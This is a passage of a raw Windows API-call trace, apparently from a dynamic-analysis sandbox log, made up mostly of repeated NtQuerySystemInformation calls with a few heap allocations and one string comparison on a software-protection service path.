SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd150, Length=0x28, ResultLength=0x0) [0273.782] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0273.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcfa0, Length=0x28, ResultLength=0x0) [0273.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0273.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.814] GetProcessHeap () returned 0x27fc8db0000 [0273.814] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f81fb0 [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.839] GetProcessHeap () returned 0x27fc8db0000 [0273.839] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f822e0 [0273.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd550, Length=0x28, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0276.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd470, Length=0x20, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd530, Length=0x20, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0276.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0276.877] 